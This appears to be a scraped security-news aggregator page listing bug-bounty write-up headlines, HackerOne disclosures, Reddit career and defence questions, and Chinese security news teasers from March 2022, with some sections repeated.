    A simple story when Allah allowed me to get P1 by combining several issues, one of which was related to “weak credentials”. Continue reading on InfoSec Write-ups »
    How I access other domains in infinityfree.net using Directory Traversal
    Hi, it’s me again haha Kurt Russelle Marmol aka xkurtph, Web Developer (noobie) and Security Researcher. Continue reading on Medium »
  • Open

    registering with the same email address multiple times leads to account takeover
    Reddit disclosed a bug submitted by whitehacker18: https://hackerone.com/reports/785833
    User files is disclosed when someone called while the screen is locked
    Nextcloud disclosed a bug submitted by ctulhu: https://hackerone.com/reports/1338781 - Bounty: $350
    Specially crafted message request crashes the webapp for users who view the message
    Mattermost disclosed a bug submitted by thesecuritydev: https://hackerone.com/reports/1253732 - Bounty: $150
  • Open

    Can an HTTPS Website be Hacked?
    It should be no shock by now that a professional can break through anything. These days, zero-days are a dime a dozen, so it’s important to ensure your site is hardened and protected as much as possible. While an SSL certificate can certainly be an important factor, it’s only one slice of the pie. In this article, we’ll be elaborating on the myths of SSL, the kinds of hacks that still have the potential to occur, and how you can improve an HTTPS site beyond installing an SSL certificate.  Continue reading Can an HTTPS Website be Hacked? at Sucuri Blog.
  • Open

    Wanting to be Pentester
    Just finished High school and am wanting to be a Pentester.Got inspired by Mr.Robot Really. Got little knowledge of Python and C , what are the ways to learn more and what to take in college for it. submitted by /u/Small_Run9123 [link] [comments]
    is it too late for me to become a pentesfer
    Hello. I'm about to graduate college. I have some decent programming experience but no security experience. I can't do the most basic CTFs. If I get OSCP and some other certs will that be enough to do a Jr pentesting job? Will that enable me to do some CTFs? I feel like I should have started when I was like 13. Is it too late for me? submitted by /u/Hellothere6667 [link] [comments]
    General advice needed for dealing with IPS alerts
    We have set up IPS monitoring on our firewall and I've been taking a look through the IPS events. Some are obvious on how to deal with, but some are harder, and I wondered if I could get some insight on what the process you guys would follow is for these? For example, one of our laptops on the remote VPN is triggering a IPS alert - 'TCP Segment Overwrite' I google the text and I see that "This signature fires when one or more TCP segments in the same stream overwrite data from one or more segments located earlier in the stream. This may indicate an attempt to hide an attack." and also "Overwriting TCP segments does not normally occur and should be treated with suspicion" OK, sounds suspicious? So I run an AV scan, and the machine comes up clean. So where would I go from here? Disclaimer, I'm no "Mr Robot" lol. I can understand TCPdump in terms of tracing where a packet is going and which interface it goes in / out etc but when it comes down to analysing packet contents etc with Wireshark, well..my abilities just don't stretch that far :( I always seem to hit this brick wall with a lot of IPS alerts where I'm just sat thinking, I don't know exactly what's causing it so I can't say it's a false positive or not. It's very frustrating! :/ Thanks for any advice you can give! submitted by /u/EffectiveClock [link] [comments]
    FOSS App Whitelisting Suggestions for Win 10 Home
    I'm running Windows 10 Home on a personal computer and am seeking a FOSS-alternative to AppLocker (AppLocker can only be managed on Windows 10 Enterprise, Education, etc.). Does anyone have any suggestions? submitted by /u/cyberphor [link] [comments]
    How to clean a infected USB
    Hi everyone, Let's say I have a USB and I'm sure there is some kind of virus in it. What is the best way to clean and secure it so I can use it on my further days? submitted by /u/emir0723 [link] [comments]
    I'm losing hope
    In October I realized I hated my job and I've decided to learn IT because I've always wanted to work in that field. I did CS50 to the end and I loved it. Since I couldn't decide in what domain of IT I wanted to pursue my learning path (because everything interests me in IT), I went into cyber security since it's pretty much the IT domain that includes all the IT domains. I did TryHackMe's Pre Security path and now I'm almost done with the Jr Pentester path. I'm planning to do the Blue Team path. I also do CTFs to practice along. At this point I suppose that if this field was not for me I would've known by now, but so far I love it. I want to become a Blue Teamer Now I'm reading here and there on Reddit that it's impossible to start in cybersec for a beginner because you need real IT experience for instance years as a software/network engineer. Back when I started learning, people told me that I just needed Lab practice and Certifications and then boom I could apply for entry level jobs in cybersec. I wanted to get my foot in the door by starting as a Help Desk and then as a Sys Admin, mastering the fundamentals is obviously mandatory so I know I can't just start as a Blue Team Expert, but do I really need to be a network engineer for multiple years to then have enough XP to enter cybersec's (cybersex) field ? Thank you for guiding me ​ TLDR: Is it mandatory to be an ex software/network engineer to then work in cyber security ? submitted by /u/No-Lead497 [link] [comments]
    Converting .nessus files to CSV
    Hello AskNetsec, I have been performing CIS Benchmark scans and I am trying to find a good method for keeping track of audits while trying to remediate them. This is both for myself, our engineers and management. I have been struggling trying to find the right format to do this. I would like to convert .nessus files into CSV, I hope that will do the trick. Does anyone know a good method of converting from .nessus to CSV? If you have any other recommendations as to how to streamline this process you are most welcome to comment it. Thank you in advance! submitted by /u/Gabbana2 [link] [comments]
    about which cert should I pick
    my uni is providing few certs under institutional training. the certs are. CompTIA A+ CompTIA Linux+ CompTIA Network+ CompTIA Server+ CompTIA Security+ VMWare Virtualization and Software Defined Network Concepts. Palo Alto Cloud Security Fundamentals. Palo Alto Security Operations Fundamentals. my goal is to become penetration tester and I an currently first year student. I had plans to get security+ in 3rd year but since our uni has partnered I am confused which of these certs is best for me so that these help me in placement drive and so that I can focus on studying for oscp from 2nd year. so basically which cert should I choose. I am very grateful for your help!! submitted by /u/Otaku531 [link] [comments]
    Could Russia create a true “splinternet”?
    Guess one model would be North Korea, but something tells me that Russia would have harder time based on geography and the population’s current usage of the internet. submitted by /u/DryBloomer [link] [comments]
  • Open

    AWS/GitLab Self-Hosted CTF
    submitted by /u/RedTermSession [link] [comments]
    Shodan: Introducing the InternetDB API
    submitted by /u/D4r1 [link] [comments]
    Making Sense Of The Dirty Pipe Vulnerability (CVE-2022-0847) - RedHunt Labs
    submitted by /u/redhuntlabs [link] [comments]
    FirmWire is a full-system baseband firmware emulation platform
    submitted by /u/domenukk [link] [comments]
  • Open

    A Detailed Guide on httpx
    Introduction httpx is a fast web application reconnaissance tool coded in go by www.projectidscovery.io. With a plethora of multiple modules effective in manipulating HTTP requests The post A Detailed Guide on httpx appeared first on Hacking Articles.
    A Detailed Guide on httpx
    Introduction httpx is a fast web application reconnaissance tool coded in go by www.projectidscovery.io. With a plethora of multiple modules effective in manipulating HTTP requests The post A Detailed Guide on httpx appeared first on Hacking Articles.
  • Open

    How Important is The Red Team in Cyber Security?
    A red team plays a crucial role in cyber security as they pose as “ethical hackers.” Continue reading on Medium »
    TRY HACK ME: Intro to C2 Write-Up
    Task 1 Introduction - Continue reading on Medium »
  • Open

    Tonight at Midnight Presenting…
    If you pre-ordered, you know where I am going with this! Continue reading on Medium »
    SXSW 2022: Ti West’s X: Horror, Executed
    X is, indeed, gonna give it to ya Continue reading on Cinapse »
  • Open

    小白谈数据安全2
    浅谈数据安全制度体系。
    FreeBuf早报 | 匿名者号召俄罗斯人“消灭普京”;因网络攻击海贼王停播
    近日,Anonymous 向俄罗斯公民发布了一条新信息,邀请他们一起“消灭”正在牺牲他们并杀害乌克兰人的总统普京。
    HIPAA合规SSL数字证书是什么?
    随着数字化的广泛应用,SSL数字证书已成为网络不可或缺的一部分,保护敏感数据通信和用户隐私比以往任何时候都更加重要
    《未成年人网络保护条例(征求意见稿)》再次公开征求意见
    《条例》共七章六十七条,指出家庭、学校和其他教育机构应当教育引导未成年人参加有益身心健康的活动,预防和干预未成年人沉迷网络。
    网站只有一个登录框怎么办?———用户名密码重置的6种绕过情况
    找回密码时使用位数较少的短信验证码,或者验证码没有设置有效时间限制,导致攻击者借助自动化工具在一定时间范围内爆破获得短信验证码,从而导致重置任意账号密码。
    当心,安卓银行木马Escobar 正伺机而动
    Escobar作为Aberebot恶意软件的新版本,迭代了新功能,包括窃取 Google Authenticator 多因素身份验证代码。
    育碧遭遇网络攻击,造成服务暂时中断
    有关育碧遭到网络攻击的谣言在网上流传,而数据勒索组织LAPSUS$则表明这并不是留言,他们已经入侵了育碧。
    全国信安标委公布《2022年网络安全国家标准需求清单》
    清单共包含34项标准,其中制定标准20项,修订标准14项。
    盘点:12种基于风险的身份验证工具
    基于风险的身份验证(RBA)也称为自适应身份验证,是一种在不强制用户使用两因素身份验证(2FA)的情况下提高网站账户安全性的方法。
    FreeBuf早报 | 谷歌向乌克兰安卓用户推出空袭报警系统;育碧证实遭网络攻击
    谷歌官方博客宣布向乌克兰安卓用户推送空袭警报系统。谷歌称,有数百万人依赖于空袭警报系统,它通过Play Services推送。
  • Open

    SecWiki News 2022-03-14 Review
    [HTB] Ophiuchi Writeup by 0x584a Watchdog 还是 TeamTNT?一例攻击归因刍议 by Avenger SecWiki周刊(第419期) by ourren 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2022-03-14 Review
    [HTB] Ophiuchi Writeup by 0x584a Watchdog 还是 TeamTNT?一例攻击归因刍议 by Avenger SecWiki周刊(第419期) by ourren 更多最新文章,请访问SecWiki
  • Open

    From Recon via Censys and DNSdumpster, to Getting P1 by Login Using Weak Password — “password”
    No content preview
    Insecure comparison in PHP — Business Logic Bypass vulnerability
    No content preview
    How Did I Leak 5.2k Customer Data From a Large Company? (via Broken Access Control)
    No content preview
    SQLi: Next Level
    No content preview
    Shocker From Hackthebox
    No content preview
    Setup Armitage as a Command & Control (C2) Framework for Free
    No content preview
    UTCTF 2022 — Writeup
    No content preview
    Return-Oriented Programming on RISC-V — Part 1
    No content preview
  • Open

    From Recon via Censys and DNSdumpster, to Getting P1 by Login Using Weak Password — “password”
    No content preview
    Insecure comparison in PHP — Business Logic Bypass vulnerability
    No content preview
    How Did I Leak 5.2k Customer Data From a Large Company? (via Broken Access Control)
    No content preview
    SQLi: Next Level
    No content preview
    Shocker From Hackthebox
    No content preview
    Setup Armitage as a Command & Control (C2) Framework for Free
    No content preview
    UTCTF 2022 — Writeup
    No content preview
    Return-Oriented Programming on RISC-V — Part 1
    No content preview
  • Open

    From Recon via Censys and DNSdumpster, to Getting P1 by Login Using Weak Password — “password”
    No content preview
    Insecure comparison in PHP — Business Logic Bypass vulnerability
    No content preview
    How Did I Leak 5.2k Customer Data From a Large Company? (via Broken Access Control)
    No content preview
    SQLi: Next Level
    No content preview
    Shocker From Hackthebox
    No content preview
    Setup Armitage as a Command & Control (C2) Framework for Free
    No content preview
    UTCTF 2022 — Writeup
    No content preview
    Return-Oriented Programming on RISC-V — Part 1
    No content preview
  • Open

    攻防 tricks — 通过兼容性差异突破安全防护
    作者:Glassy 原文链接:https://g1asssy.com/2022/03/11/fuzz/ 引言 安全防护产品在进行防护的时候是需要对流量中的数据进行处理的,同样,被攻击的应用也需要处理这些数据以保证业务的正常进行,然而在很多情况下,安全产品处理数据流的框架和应用处理数据流的框架往往不同,在针对常规数据方面,当然不会出现问题,然而一旦被防护应用的数据处理框架的兼容性大于安全产品数...
    攻防 tricks — 通过兼容性差异突破安全防护
    作者:Glassy 原文链接:https://g1asssy.com/2022/03/11/fuzz/ 引言 安全防护产品在进行防护的时候是需要对流量中的数据进行处理的,同样,被攻击的应用也需要处理这些数据以保证业务的正常进行,然而在很多情况下,安全产品处理数据流的框架和应用处理数据流的框架往往不同,在针对常规数据方面,当然不会出现问题,然而一旦被防护应用的数据处理框架的兼容性大于安全产品数...
    The idols NFT marketplace 重入漏洞分析
    作者:Dig2 本文为作者投稿,Seebug Paper 期待你的分享,凡经采用即有礼品相送! 投稿邮箱:paper@seebug.org 背景介绍 The idols是以太坊上的NFT项目,其特点在于会按照用户持有idols NFT的数量,分红Lido质押奖励(资金来源为项目公售获得的约2250 ETH)。该项目同时发行$VIRTUE代币,购买并质押代币的用户会分红idols NFT的交易...
    The idols NFT marketplace 重入漏洞分析
    作者:Dig2 本文为作者投稿,Seebug Paper 期待你的分享,凡经采用即有礼品相送! 投稿邮箱:paper@seebug.org 背景介绍 The idols是以太坊上的NFT项目,其特点在于会按照用户持有idols NFT的数量,分红Lido质押奖励(资金来源为项目公售获得的约2250 ETH)。该项目同时发行$VIRTUE代币,购买并质押代币的用户会分红idols NFT的交易...
  • Open

    攻防 tricks — 通过兼容性差异突破安全防护
    作者:Glassy 原文链接:https://g1asssy.com/2022/03/11/fuzz/ 引言 安全防护产品在进行防护的时候是需要对流量中的数据进行处理的,同样,被攻击的应用也需要处理这些数据以保证业务的正常进行,然而在很多情况下,安全产品处理数据流的框架和应用处理数据流的框架往往不同,在针对常规数据方面,当然不会出现问题,然而一旦被防护应用的数据处理框架的兼容性大于安全产品数...
    攻防 tricks — 通过兼容性差异突破安全防护
    作者:Glassy 原文链接:https://g1asssy.com/2022/03/11/fuzz/ 引言 安全防护产品在进行防护的时候是需要对流量中的数据进行处理的,同样,被攻击的应用也需要处理这些数据以保证业务的正常进行,然而在很多情况下,安全产品处理数据流的框架和应用处理数据流的框架往往不同,在针对常规数据方面,当然不会出现问题,然而一旦被防护应用的数据处理框架的兼容性大于安全产品数...
    The idols NFT marketplace 重入漏洞分析
    作者:Dig2 本文为作者投稿,Seebug Paper 期待你的分享,凡经采用即有礼品相送! 投稿邮箱:paper@seebug.org 背景介绍 The idols是以太坊上的NFT项目,其特点在于会按照用户持有idols NFT的数量,分红Lido质押奖励(资金来源为项目公售获得的约2250 ETH)。该项目同时发行$VIRTUE代币,购买并质押代币的用户会分红idols NFT的交易...
    The idols NFT marketplace 重入漏洞分析
    作者:Dig2 本文为作者投稿,Seebug Paper 期待你的分享,凡经采用即有礼品相送! 投稿邮箱:paper@seebug.org 背景介绍 The idols是以太坊上的NFT项目,其特点在于会按照用户持有idols NFT的数量,分红Lido质押奖励(资金来源为项目公售获得的约2250 ETH)。该项目同时发行$VIRTUE代币,购买并质押代币的用户会分红idols NFT的交易...
  • Open

    How to Fact Check News
    Now, more than ever we are bombarded with news on and offline. Friends share stories or post them on their walls, but how do you tell what… Continue reading on Medium »
    Solution to some CTF challenges from https://investigator.cybersoc.wales
    A few months ago I participated in the CTF of https://investigator.cybersoc.wales/. Continue reading on Medium »
  • Open

    Is there a way to see how someones API is formatted?
    I have the source files of the react app, it uses the next.js framework. The .env file has process.env.NEXT_PUBLIC_API and process.env.NEXT_PUBLIC_API_TOKEN I was able to get both values by using the inspect tool on the live page. They are NEXT_PUBLIC_API=https://api.example.com NEXT_PUBLIC_API_TOKEN=thetokenstring The next.config.js file reads module.exports = { webpack: (config, { isServer }) => { // Fixes npm packages that depend on `fs` module if (!isServer) { config.node = { fs: 'empty' } } return config } } I am trying to re-create the api so I can use my own in my app. When I use the inspect tool again on the live app and click the network tab, I can see the data the api is pulling it. It seems to be just in simple json formatting. When I enter the site through builtwith.com I can see some of it is hosted on AWS EC2 in addition to vercel. In the a .js file - the API is pulled in like: _getPairs = async () => { try { const response = await fetch(`${process.env.NEXT_PUBLIC_API}/api/v1/pairs`, { method: 'get', headers: { 'Authorization': `Basic ${process.env.NEXT_PUBLIC_API_TOKEN}`, } }) const pairsCall = await response.json() return pairsCall.data } catch(ex) { console.log(ex) return [] } } and updatePairsCall = async ( account) => { try { const response = await fetch(`${process.env.NEXT_PUBLIC_API}/api/v1/updatePairs`, { method: 'get', headers: { 'Authorization': `Basic ${process.env.NEXT_PUBLIC_API_TOKEN}`, } }) const pairsCall = await response.json() this.setStore({ pairs: pairsCall.data }) await this._getPairInfo( account, pairsCall.data) } catch(ex) { console.log(ex) } } ​ Is there an easy way to re-create this API? Im a totally off base? Thank you submitted by /u/tokentrader [link] [comments]
  • Open

    Mac photo library
    Can it be determined what device was responsible for uploading image to cloud in photos.sqlite database — what info is available? submitted by /u/Complete-Cockroach80 [link] [comments]

  • Open

    Solution to my $20 egg hunt (Part 1)
    Last week, I posted an article titled “There’s $20 hidden in this post”. Here’s how to solve the first part of it… Continue reading on Medium »
    The story of 3 bugs that lead to Unauthorized RCE — Pascom Systems
    A detailed post on how I chained 3 vulnerabilities (A path traversal, An SSRF in an external piece of software, and a post-authentication… Continue reading on Medium »
    Open Redirect via Sendgrid Email Misconfiguration
    Hello developer , bug hunter and cyber security enthusiast. In this opportunity i wanna show you my first Bug Bounty writeup from one of a… Continue reading on System Weakness »
    Cybersecurity Bible: The 5 rules for every beginner.
    I have come a long way in cybersecurity. Here’s why I'm eligible for writing this, I have faced every problem, had sleepless nights, and… Continue reading on Medium »
  • Open

    Reverse Engineering a Netgear NDay
    submitted by /u/lightgrains [link] [comments]
    An automated setup for fuzzing Apache httpd w/ AFL++
    submitted by /u/pwntheplanet [link] [comments]
    An automated setup for fuzzing Redis w/ AFL++
    submitted by /u/pwntheplanet [link] [comments]
  • Open

    Have I been Hacked or not????
    Have you ever thought you have been hacked? Or do you think your data’s secure in the digital world? We’re using many apps in our day to… Continue reading on Medium »
    Good News Roundup: the OSINT-inspired Geek Edition
    In this week’s good news, OSINT mobilizes for Ukraine, movement ecology achievements in AI, plus #Rstats tips for GIS and genomics Continue reading on Medium »
    SPY NEWS: 2022 — Week 10
    Summary of the espionage-related news stories for the Week 10 (7–12 March) of 2022. Continue reading on Medium »
  • Open

    Questions about getting into DF
    Hi everybody. I'm sorry if this post goes against any rules or has been answered in depth somewhere else. I'm a 2nd year computer science major wondering about getting into DF, especially the LE side of things. Does anyone resources or information about the general path to get a job in DF? Are there certain ternships or work experience you can get while earning a degree that will help more than others? Are there specific certifications I should be looking to get in the future? Should I be pursuing a degree in DF, or would a degree in CS be a good base to work with? I don't think I have many classes that would transfer over besides some math/stats classes and a class on computer systems. I'm really just interested in seeing what the fastest path I can take from here to a job is, if I do end up pursuing DF. I really don't have any knowledge on DF or cybersecurity, but I made a tryhackme account and I'll test the waters with some of the modules on there to see if I wanna really dive into this field. I've heard about SANS courses, seen some good online DF degrees from Champlain and other colleges, but I'm just not sure where to go from here. Thank you to anyone who takes the time to answer any of these questions! submitted by /u/Normijah625 [link] [comments]
  • Open

    小白谈数据安全1
    安全小白对数据安全的泛泛谈
    《2021网络空间测绘年报》解读|公有云资产画像与风险度量
    近日,绿盟科技与中国电信联合发布《2021网络空间测绘年报》,旨在通过测绘的方法,发现物联网、公有云、工控系统、安全设备、数据库、智慧平台等关键领域资产在公网上的暴露情况
    《2021 DDoS攻击态势报告》解读 | 基于威胁情报的DDoS攻击防护
    随着5G、云计算、大数据、物联网等新兴数字产业的发展,信息基础设施的建设规模也随之扩大,这无疑会导致越来越多的网络资产暴露在互联网上。这些资产一旦被DDoS攻击者所利用,将会对网络安全带来严重威
    如何使用Katoolin3将Kali中的所有程序轻松移植到Debian和Ubuntu
    帮助广大研究人员将Kali Linux中的各种工具轻松移植到Debian和Ubuntu等Linux操作系统中。
    俄罗斯将禁止 Instagram
    俄罗斯互联网监督机构 Roskomnadzor 将在俄罗斯禁止 Instagram。
    iptables&Netfilter简介
    iptables&Netfilter简介
    SyntheticSun – 深度防御安全自动化和监控框架,利用威胁情报、机器学习、托管 AWS 安全服务和无服务器技术持续预防、检测和响应威胁
    SyntheticSun 是一个深度防御安全自动化和监控框架,它利用威胁情报、机器学习、托管 AWS 安全服务和无服务器技术来持续预防、检测和响应威胁。
  • Open

    SecWiki News 2022-03-13 Review
    Linux系统安全强化指南 by ourren 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2022-03-13 Review
    Linux系统安全强化指南 by ourren 更多最新文章,请访问SecWiki
  • Open

    Oracle Access Manager Pre-Auth RCE (CVE-2021–35587 Analysis)
    Article URL: https://testbnull.medium.com/oracle-access-manager-pre-auth-rce-cve-2021-35587-analysis-1302a4542316 Comments URL: https://news.ycombinator.com/item?id=30661899 Points: 1 # Comments: 0
  • Open

    Fuzzing with AFL – Part 2: Trying Smarter(Apache)
    Article URL: https://0xbigshaq.github.io/2022/03/12/fuzzing-smarter-part2 Comments URL: https://news.ycombinator.com/item?id=30661893 Points: 1 # Comments: 0
  • Open

    scancss - Fastest tool to find XSS.
    Cross site scripting (XSS) vulnerability is very easy, popular and available on many websites. Continue reading on Medium »
  • Open

    How secure is creditcard info on company servers nowadays?
    I'm reluctant to use credit cards when I can because I've seen a lot of stories of hacks into places like hotel servers where they get access to card details , customer name & address, etc But most of these are from a few years ago, has there been can upgrade that miniminzsd the risk of this happening nowadays? As in is this info stored in a more secure way now? submitted by /u/computerstuffs [link] [comments]
    Fuzz testing in the SDLC
    My company’s security org is curious about adding fuzz testing to our secure SDLC pipeline. I’ve been reading about the topic, which I’m finding fascinating, but it’s also left me with some questions about when to fuzz and which flavour of fuzzing would make sense for the large number of services/APIs in our portfolio. -At which phase does fuzzing get in the picture? Is this something typically run later as in QA and deployment/release or post-commit/build similar to SAST? Would the latter scenario be redundant given we run SAST? -How agile is black box and grey box (instrumentation guided) fuzzing for an app portfolio with a rapidly changing attack surface? I’m leaning towards black-box mutation and template fuzzers since the attack surface can be supplied via a network traffic capture, API specification…all of which are easily retrievable from other tools in our QAT/AST framework. My understanding is grey box fuzzers require user programmed harness classes to interface with the app. Meaning every time a new entry point is added or removed or a new app is onboarded, the fuzzer needs an updated setup. Afaik this setup is done manually at least for all the open-source grey box fuzzers I’ve looked into. Any gotchas or recommendations on fuzz testing adoption strategy are much appreciated. submitted by /u/phuckphuckety [link] [comments]
    Any thoughts on this course called HEXORCIST?
    Looking for if anyone has any thoughts or opinions on this course for reverse engineering or if they themselves have signed up for this course? The course is found here https://www.reverse-engineer.net/ submitted by /u/SufficientDistrict10 [link] [comments]
    Organizing vulnerability research?
    Hi all! I've been doing bits and pieces of vulnerability research on my own time, and typically I do it only so far as I feel "engaged" with the project. As you might imagine, this leads to dropping projects often and swapping between them, which looks horrible for career potential but also leads me to be constantly burnt out of research and other hobby projects. I am revisiting a very niche router OS with intention to reverse engineer the firmware, such that I can understand its attack surface (and find bugs, eventually). This is a massive undertaking for me, but one that I believe is a good move as doing so would demonstrate my ability to adapt and learn new things; the biggest problem though, is me and my lack of organization. Thus, I'm wondering what tactics, techniques and procedures you all use when going about research. I'm no stranger to kanban boards and the like, and appreciate the idea of planning things out in weekly chunks, but is this advisable? submitted by /u/Mostly_Breadfruit [link] [comments]
  • Open

    Implementing Syscalls in Cobalt Strike Part 1 - Battling Imports and Dependencies
    submitted by /u/dmchell [link] [comments]
  • Open

    Korean and English Folder names, Movie names. stuff all over the place. (nsfw just in case)
    submitted by /u/thats_dumberst [link] [comments]

  • Open

    KB4288: CVE-2022-26500 | CVE-2022-26501
    submitted by /u/ghost-train [link] [comments]
    Casper-fs is a Custom Hidden Linux Kernel Module generator. Each module works in the file system to protect and hide secret files.
    submitted by /u/CoolerVoid [link] [comments]
  • Open

    Can anyone recommend a free remediation tracking software?
    App, web app, i dont care. i just need to keep track of things and organize them. Thanks submitted by /u/networkalchemy [link] [comments]
    Tool for network visualization
    Is there any free script or tool to visualize network knots like here? https://miro.medium.com/max/600/1*D3DB7o6maH5BAxm5vWL4XA.png submitted by /u/dashlf92 [link] [comments]
    Open source Web application security scan tool
    Is there any good Open Source Web Application Security Scan Tool you can recommend? We've developed a few web applications and look to build better protections. thanks, submitted by /u/alphasystem [link] [comments]
    State of the Subreddit #4
    Hello r/AskNetsec! It's been a while since we've last done one of these, and we hope that you all have been well. We the moderators, wish you all well, and that everyone stays safe during these interesting times. ​ Flair system! -As you might have noticed, flairs have appeared. In order to organize the sub in a friendly manner, we have implemented a required flair system. The flairs: Analysis – Requesting aid to determine security/network-related issues. WITH DATA/Background Architecture – Questions related to best practices for environmentally based things. Product etc. Concepts – Questions around security concepts (IE Least Privileged, User Awareness, CIA Triad, Walled Garden, etc.) Threats – Questions related to specific threats in the security landscape. Compliance – Questions around compliance and legal standards (GDPR, NIST, PCI-DSS, etc.) Education – Further education questions, what certificates, degrees to go for, getting started in the field, etc. Work – Related to work questions. Burnout, salary, HR, etc. Other – Not fitting other categories. This is, of course, still a work in progress. Please feel free to comment on any suggestions you might have. ​ I would like to iterate that asking for help in committing a crime of any sort is not allowed. This is an immediate permanent ban. ​ The sub has been growing well in the past few months, and we couldn't be more grateful for the support that has been given. We will see you all again in 3 months for the next State of the Subreddit. ​ - AskNetSec Moderators submitted by /u/-Vampires- [link] [comments]
  • Open

    What model of ThinkPad should I buy for malware analysis?
    I am going to be starting community college as a cybersecurity major, and I am really interested in malware analysis. I heard that the ThinkPad is a pretty good laptop for that sort of thing, so I am looking into buying one pretty soon. I'm currently doing an internship and my boss told me that I should get a laptop that runs Hyper-V and VM. He also told me that the P15 series is pretty good for malware, but I am not sure yet. What model of the ThinkPad should I get for this what specs do you suggest that I look for? submitted by /u/MadScientist876 [link] [comments]
    Asking for help in what’s steps need to be taken to data recovery on a wiped iPhone 6s 128g
    I recently received an iPhone 6s 128gb in for data recovery I’m using this as an opportunity for learning as I’ve never done recovery on an iPhone so I came here to ask what step should I take and what should be done for the best chance of data of recovery Please and thank you submitted by /u/23Weirdo23 [link] [comments]
    Prima facie
    Typically how is prima facie established in digital forensics? Again, is user attribution important for prima facie or is a somebody owning an equipment/control of an account sufficient? submitted by /u/Complete-Cockroach80 [link] [comments]
  • Open

    Geolocating Images — Tryhackme
    Görüntüleri Coğrafi Konum Belirleme Continue reading on Medium »
  • Open

    Domain Escalation: Resource Based Constrained Delegation
    Introduction Delegation has been a part of Microsoft’s Active Directory environment since the early 2000s and has remained one of few ignored threats by system The post Domain Escalation: Resource Based Constrained Delegation appeared first on Hacking Articles.
    Domain Escalation: Resource Based Constrained Delegation
    Introduction Delegation has been a part of Microsoft’s Active Directory environment since the early 2000s and has remained one of few ignored threats by system The post Domain Escalation: Resource Based Constrained Delegation appeared first on Hacking Articles.
  • Open

    A bug that made me $250
    Hey guys! I’m back with another write-up and this one’s about a bug for which I got awarded $250, so let’s start. Continue reading on Medium »
    Tactical Fuzzing — XSS
    XSS Continue reading on Medium »
    A Tale of Open Redirection to Stored XSS
    Hello guys, Continue reading on Medium »
    I have Found Microsoft Subdomain Website database list, database username, password
    Hello, Hackers 👋👋 Continue reading on Medium »
    XSS through base64 encoded JSON
    This is one of my very interesting and unexpected finding while testing an Application Tracking System. Continue reading on Medium »
  • Open

    The Discovery and Exploitation of CVE-2022-25636
    Article URL: https://nickgregory.me/linux/security/2022/03/12/cve-2022-25636/ Comments URL: https://news.ycombinator.com/item?id=30653137 Points: 92 # Comments: 3
  • Open

    SecWiki News 2022-03-12 Review
    安全中间件的设计思路和简单实践 by ourren 威胁情报平台OpenCTI的搭建 by ourren 人工智能(AI)&网络安全 by ourren 安全和美-我对网络安全的观察和思考 by ourren 开源组件治理的实践与思考 by ourren AKG:攻击者知识图谱 by ourren 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2022-03-12 Review
    安全中间件的设计思路和简单实践 by ourren 威胁情报平台OpenCTI的搭建 by ourren 人工智能(AI)&网络安全 by ourren 安全和美-我对网络安全的观察和思考 by ourren 开源组件治理的实践与思考 by ourren AKG:攻击者知识图谱 by ourren 更多最新文章,请访问SecWiki
  • Open

    Census Vulnerability Exposes 10k OAuth Tokens, Thousands of User Records
    Article URL: https://robertwillishacking.com/census-vulnerability-exposes-10k-oauth-tokens-thousands-of-user-records/ Comments URL: https://news.ycombinator.com/item?id=30652143 Points: 3 # Comments: 0
  • Open

    Casper-fs LKM
    Casper-fs is a Custom Hidden Linux Kernel Module generator. Each module works in the file system to protect and hide secret files This program has two principal functions: turning private files hidden. The second function is to protect confidential files to prevent reading, writing and removal. https://github.com/CoolerVoid/casper-fs submitted by /u/CoolerVoid [link] [comments]

  • Open

    Insecure comparison in PHP — Business Logic Bypass vulnerability
    I have recently spotted an interesting vulnerability in a PHP application, which was in scope of a private bug bounty program. This… Continue reading on InfoSec Write-ups »
    How Did I Leak 5.2k Customer Data From a Large Company? (via Broken Access Control)
    Hello everyone! Continue reading on Medium »
    Rate Limit Bypass at Readme.com
    Hey Community !! Continue reading on Medium »
    How i chained open-redirect to SSRF(Server Side Request Forgery)?
    So you are here, i have seen people reporting open-redirect without exploiting it for SSRF and being happy with low impact. You should… Continue reading on Medium »
    How I was able to takeover any users account on a major telecoms website
    Hello, todays write up is about multiple instances of the same vulnerability I found on a major African telecoms providers website, we… Continue reading on Medium »
    FREE LABS TO TEST YOUR PENTEST/CTF SKILLS
    · Academy Hackaflag BR - https://hackaflag.com.br/ · Attack-Defense - https://attackdefense.com · Alert to win - https://alf.nu/alert1 ·… Continue reading on Medium »
    A bug bounty mistake…
    Sometimes if it looks like XSS, it may not actually be XSS. Continue reading on Medium »
  • Open

    New Content!
    Hello! If you happen to find this page, all content has been moved and will be published to my new site going forward. Continue reading on Medium »
    TryHackMe | Red Team Fundamentals WriteUp
    This room is an introduction to red teaming Continue reading on Medium »
    TryHackMe writeup: Steel Mountain
    Steel Mountain is a TryHackMe room that sports a Mr. Robot theme. It is great for those into hacking shows an new to the scene! Continue reading on InfoSec Write-ups »
  • Open

    As an IT veteran, getting into Cybersecurity. What are my best next steps to move toward an IT/Cybersecurity Forensics career?
    Hello everyone. I will achieve my Security+ degree this year (mere months away). Currently, I have lots of IT experience, over 20 years of IT analyst, Helpdesk, and IT Desktop support, but I'm new to IT Security beyond what those roles entail. My question is: What should my next step(s) be to getting a solid Cybersecurity Forensics career underway? I love remote (WFH) work and hope to one day have more of that, and less office time needed, but starting out, I'll do what I have to do. Do I need to study for a more advanced cert right away after getting the Security+? I know I need to work in a more entry-level IT Security-based job FIRST, get my feet wet obviously, prove I can do the basics, but beyond that, what should I be focusing on to move in the IT forensics direction? I really do appreciate any help, tips, play by plays, or just guidance for this general. submitted by /u/cleverestx [link] [comments]
    Google search warrant return question
    As you can tell by reading, I'm new to this. Thanks for any insights: Is it normal that some of the elements of a Google search warrant are formatted in HTML as a bunch of boxes containing information? I'm surprised that it wouldn't just be all in CSV or some other easy to parse/sort format. Under MyActivity, there's a document that lists browser/search activity (in boxes) that say "Visited Google Search" but none of these appear to contain any detail about what was searched. Am I not able to see what was actually searched? Is that something the user elected to keep private or is that standard reporting behavior of a Google return? Is folder-by-folder, file-by-file examination of these various HTML and CSV files the way most people approach looking through these things? Is there an obvious, better way? submitted by /u/PieWithIceCreamCrust [link] [comments]
  • Open

    SATCOM terminals under attack in Europe: a plausible analysis.
    submitted by /u/eberkut [link] [comments]
    An unexpected Redis sandbox escape affecting only Debian, Ubuntu, and other Debian derivatives
    submitted by /u/albinowax [link] [comments]
  • Open

